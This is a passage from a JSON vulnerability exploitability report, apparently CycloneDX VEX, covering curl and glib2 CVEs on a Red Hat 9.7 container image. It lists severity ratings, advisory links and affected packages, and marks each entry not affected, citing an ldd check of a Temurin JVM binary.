"medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 6.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "description": "When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,\nchanging TLS options in one thread would inadvertently change them globally\nand therefore possibly also affect other concurrently setup transfers.\n\nDisabling certificate verification for a specific transfer could\nunintentionally disable the feature for other threads as well.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-14017" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/07/3" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-14017" }, { "url": "https://curl.se/docs/CVE-2025-14017.html" }, { "url": "https://curl.se/docs/CVE-2025-14017.json" }, { "url": "https://github.com/advisories/GHSA-jh4h-2cg6-889h" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14017" }, { "url": "https://ubuntu.com/security/notices/USN-8062-1" }, { "url": "https://ubuntu.com/security/notices/USN-8062-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-14017" } ], "published": "2026-01-08T10:15:45+00:00", "updated": "2026-01-27T21:29:39+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-14087", "ratings": [ { "source": { "name": "alma" }, "severity": "medium" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "source": { "name": "nvd" }, "score": 9.8, "severity": "critical", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "source": { "name": "oracle-oval" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "critical" }, { "source": { "name": "redhat" }, "score": 5.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 190 ], "description": "A flaw was found in GLib (Gnome Lib). This vulnerability allows a remote attacker to cause heap corruption, leading to a denial of service or potential code execution via a buffer-underflow in the GVariant parser when processing maliciously crafted input strings.", "recommendation": "Upgrade glib2 to version 2.68.4-18.el9_7.2", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-14087" }, { "url": "https://access.redhat.com/errata/RHSA-2026:15953" }, { "url": "https://access.redhat.com/errata/RHSA-2026:15969" }, { "url": "https://access.redhat.com/errata/RHSA-2026:15971" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7461" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-14087" }, { "url": "https://bugzilla.redhat.com/2419093" }, { "url": "https://bugzilla.redhat.com/2421339" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419093" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-15971.html" }, { "url": "https://github.com/advisories/GHSA-frh9-7wfp-w73p" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3834" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4933" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4934" }, { "url": "https://linux.oracle.com/cve/CVE-2025-14087.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-15971.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14087" }, { "url": "https://ubuntu.com/security/notices/USN-7942-1" }, { "url": "https://ubuntu.com/security/notices/USN-7942-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-14087" } ], "published": "2025-12-10T09:15:47+00:00", "updated": "2026-05-11T23:17:17+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2025-14512", "ratings": [ { "source": { "name": "alma" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "oracle-oval" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 190 ], "description": "A flaw was found in glib. This vulnerability allows a heap buffer overflow and denial-of-service (DoS) via an integer overflow in GLib's GIO (GLib Input/Output) escape_byte_string() function when processing malicious file or remote filesystem attribute values.", "recommendation": "Upgrade glib2 to version 2.68.4-18.el9_7.2", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-14512" }, { "url": "https://access.redhat.com/errata/RHSA-2026:15953" }, { "url": "https://access.redhat.com/errata/RHSA-2026:15969" }, { "url": "https://access.redhat.com/errata/RHSA-2026:15971" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7461" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-14512" }, { "url": "https://bugzilla.redhat.com/2419093" }, { "url": "https://bugzilla.redhat.com/2421339" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421339" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-15971.html" }, { "url": "https://github.com/advisories/GHSA-2p5v-p767-wqv5" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3845" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4935" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4936" }, { "url": "https://linux.oracle.com/cve/CVE-2025-14512.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-15971.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14512" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-14512" } ], "published": "2025-12-11T07:16:00+00:00", "updated": "2026-05-11T23:17:18+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2025-14524", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 601 ], "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a cross-protocol redirect to a second URL that uses an IMAP, LDAP,\nPOP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new\ntarget host.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-14524" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/07/4" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-14524" }, { "url": "https://curl.se/docs/CVE-2025-14524.html" }, { "url": "https://curl.se/docs/CVE-2025-14524.json" }, { "url": "https://github.com/advisories/GHSA-g897-jvjx-78vg" }, { "url": "https://hackerone.com/reports/3459417" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14524" }, { "url": "https://ubuntu.com/security/notices/USN-8062-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-14524" } ], "published": "2026-01-08T10:15:46+00:00", "updated": "2026-01-20T14:53:11+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-14819", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.8, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 295 ], "description": "When doing TLS related transfers with reused easy or multi handles and\naltering the `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally\nreuse a CA store cached in memory for which the partial chain option was\nreversed. Contrary to the user's wishes and expectations. This could make\nlibcurl find and accept a trust chain that it otherwise would not.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-14819" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/07/5" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-14819" }, { "url": "https://curl.se/docs/CVE-2025-14819.html" }, { "url": "https://curl.se/docs/CVE-2025-14819.json" }, { "url": "https://github.com/advisories/GHSA-vqhr-m87q-9jqh" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14819" }, { "url": "https://ubuntu.com/security/notices/USN-8062-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-14819" } ], "published": "2026-01-08T10:15:46+00:00", "updated": "2026-01-20T14:51:26+00:00", 